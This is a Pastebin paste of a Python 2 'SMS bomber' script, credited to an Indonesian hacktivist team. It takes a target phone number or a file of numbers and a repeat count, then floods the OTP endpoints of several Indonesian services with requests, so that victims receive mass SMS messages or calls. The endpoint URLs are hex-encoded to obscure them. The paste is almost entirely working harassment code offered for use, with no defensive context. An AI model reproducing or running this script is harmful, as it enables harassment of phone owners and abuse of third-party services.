th3pr3dat0r

BOOOOOOMBER MEDALI

Oct 16th, 2018
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.94 KB | None | 0 0
  1. import urllib,urllib2,platform,time
  2.  
  3.  
  4. if 'Windows' in platform.system():
  5.     ua = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0'}
  6. else:
  7.     ua = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36'}
  8.  
  9. ulang = ''
  10. while ulang != 'n' :
  11.     print """
  12. ._________________.
  13. | _______________ |
  14. | I             I |
  15. | I BOM SMS     I |
  16. | I     <>      I |
  17. | I     BOSS V2 I |
  18. | I_____________I |
  19. !_________________!
  20.    ._[_______]_.
  21. .___|___________|___.
  22. |::: ____           |
  23. |    ~~~~ [CD-ROM]  |
  24. !___________________!
  25.  
  26. ########################################
  27. #            BOM SMS BOSSS V2          #
  28. # Author : X-Code 404 , ZahidCode      #
  29. # Github : https://github.com/zahidin  #
  30. # Team   : IDN HACKTIVIST              #
  31. ########################################
  32.     """
  33.     print "1) Sms Tri"
  34.     print "2) Sms JD.id"
  35.     print "3) Sms Phd.id"
  36.     print "4) Sms Tokoepedia"
  37.     print "5) Call Tokopedia"
  38.  
  39.     pilihan = input('BomSms> ')
  40.  
  41.  
  42.     if pilihan == 1:
  43.         number = raw_input('Target (ex:628999888):')
  44.         limit = input('Limit :')
  45.         for i in range(limit):
  46.             data_post = {'msisdn':number}
  47.             data_post = urllib.urlencode(data_post)
  48.             url = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x65\x67\x69\x73\x74\x72\x61\x73\x69\x2e\x74\x72\x69\x2e\x63\x6f\x2e\x69\x64\x2f\x64\x61\x66\x74\x61\x72\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x4f\x54\x50'
  49.             req = urllib2.Request(url,data=data_post,headers=ua)
  50.             res = urllib2.urlopen(req)
  51.             print res.read().decode('utf-8')
  52.         ulang = raw_input('Ulang (y/n) :')
  53.     elif pilihan == 2:
  54.         number = raw_input('Target (ex:628999888):')
  55.         limit = input('Limit :')
  56.         for i in range(limit):
  57.             data_post = {'phone':number,'smsType':1}
  58.             data_post = urllib.urlencode(data_post)
  59.             url = '\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x2e\x6a\x64\x2e\x69\x64\x2f\x70\x68\x6f\x6e\x65\x2f\x73\x65\x6e\x64\x50\x68\x6f\x6e\x65\x53\x6d\x73'
  60.             req = urllib2.Request(url,data=data_post,headers=ua)
  61.             res = urllib2.urlopen(req)
  62.             print res.read().decode('utf-8')
  63.         ulang = raw_input('Ulang (y/n) :')
  64.     elif pilihan == 3:
  65.         number = raw_input('Target (ex:628999888):')
  66.         limit = input('Limit :')
  67.         for i in range(limit):
  68.             data_post = {'phone_number':number}
  69.             data_post = urllib.urlencode(data_post)
  70.             url = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x70\x68\x64\x2e\x63\x6f\x2e\x69\x64\x2f\x65\x6e\x2f\x75\x73\x65\x72\x73\x2f\x73\x65\x6e\x64\x4f\x54\x50'
  71.             req = urllib2.Request(url,data=data_post,headers=ua)
  72.             res = urllib2.urlopen(req)
  73.             print res.read().decode('utf-8')
  74.         ulang = raw_input('Ulang (y/n) :')
  75.     elif pilihan == 4:
  76.         number = raw_input('Target (ex:628999888):')
  77.         limit = input('Limit :')
  78.         for i in range(limit):
  79.             data_post = {'msisdn':number,'accept':''}
  80.             data_post = urllib.urlencode(data_post)
  81.             url = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x6b\x6f\x63\x61\x73\x68\x2e\x63\x6f\x6d\x2f\x6f\x61\x75\x74\x68\x2f\x6f\x74\x70'
  82.             req = urllib2.Request(url,data=data_post,headers=ua)
  83.             res = urllib2.urlopen(req)
  84.             print res.read().decode('utf-8')
  85.         ulang = raw_input('Ulang (y/n) :')
  86.     elif pilihan == 5:
  87.         print "1) Single"
  88.         print "2) List"
  89.         opsi = input('BomSms> ')
  90.         if opsi == 1:
  91.             number = raw_input('Target (ex:628999888):')
  92.             data_post = {'msisdn':number,'accept':'call'}
  93.             data_post = urllib.urlencode(data_post)
  94.             url = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x6b\x6f\x63\x61\x73\x68\x2e\x63\x6f\x6d\x2f\x6f\x61\x75\x74\x68\x2f\x6f\x74\x70'
  95.             req = urllib2.Request(url,data=data_post,headers=ua)
  96.             res = urllib2.urlopen(req)
  97.             print res.read().decode('utf-8')
  98.             ulang = raw_input('Ulang (y/n) :')
  99.         elif opsi == 2:
  100.             list_number = raw_input('List Target :')
  101.             numbers = open(list_number,'r').read().splitlines()
  102.             for i in numbers:
  103.                 data_post = {'msisdn':i,'accept':'call'}
  104.                 data_post = urllib.urlencode(data_post)
  105.                 url = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x6b\x6f\x63\x61\x73\x68\x2e\x63\x6f\x6d\x2f\x6f\x61\x75\x74\x68\x2f\x6f\x74\x70'
  106.                 req = urllib2.Request(url,data=data_post,headers=ua)
  107.                 res = urllib2.urlopen(req)
  108.                 print res.read().decode('utf-8')
  109.             ulang = raw_input('Ulang (y/n) :')    
  110.         else :
  111.             print "\n Nothing"
  112.             exit()
  113.  
  114.     else:
  115.         print "\n Nothing"
  116.         exit()
Add Comment
Please, Sign In to add comment